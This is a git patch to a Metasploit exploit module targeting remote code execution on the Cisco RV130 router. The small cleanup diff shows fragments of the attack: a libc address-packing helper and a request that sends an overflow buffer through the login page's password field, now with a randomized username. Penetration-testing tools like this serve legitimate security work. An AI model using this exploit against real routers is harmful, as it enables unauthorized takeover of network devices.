From 6326aa5ddaf88eafa8cd8cde1eb730e0c839fef4 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 12 Apr 2019 14:23:57 -0500 Subject: [PATCH] Clean up module and randomize username --- modules/exploits/linux/http/cisco_rv130_rmi_rce.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb index c8b0a57353..ccfe85d548 100644 --- a/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb +++ b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb @@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote )) end - def p (offset) + def p(offset) [(target['libc_base_addr'] + offset).to_s(16)].pack('H*').reverse end @@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote shellcode end - def send_request (payload) + def send_request(buffer) begin send_request_cgi({ 'uri' => '/login.cgi', @@ -111,8 +111,8 @@ class MetasploitModule < Msf::Exploit::Remote "wait_time": 0, "change_action": "", "enc": 1, - "user": "cisco", - "pwd": payload, + "user": rand_text_alpha_lower(5), + "pwd": buffer, "sel_lang": "EN" } })